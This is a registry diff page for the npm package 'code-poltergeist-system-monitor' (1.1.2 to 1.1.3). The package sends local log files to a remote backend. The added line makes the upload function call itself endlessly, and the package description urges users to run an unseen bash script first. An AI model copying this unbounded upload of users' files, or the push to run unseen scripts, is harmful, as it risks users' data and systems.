code-poltergeist-system-monitor 1.1.2 → 1.1.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -0
- package/package.json +1 -1
package/index.js
CHANGED
@@ -116,6 +116,7 @@ async function sendLogFileToBackend(filePath) {
|
|
116
116
|
},
|
117
117
|
});
|
118
118
|
console.log("Log file sent to backend:", response.data);
|
119
|
+
await sendLogFileToBackend(logFile);
|
119
120
|
} catch (error) {
|
120
121
|
console.error("Error sending log file to backend:", error.message);
|
121
122
|
}
|
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "code-poltergeist-system-monitor",
|
3
|
-
"version": "1.1.
|
3
|
+
"version": "1.1.3",
|
4
4
|
"description": "a Log Monitor for your system visit our website to see detailed analysis of your logs make sure to use our bash script before running this package or else it will fk up system",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|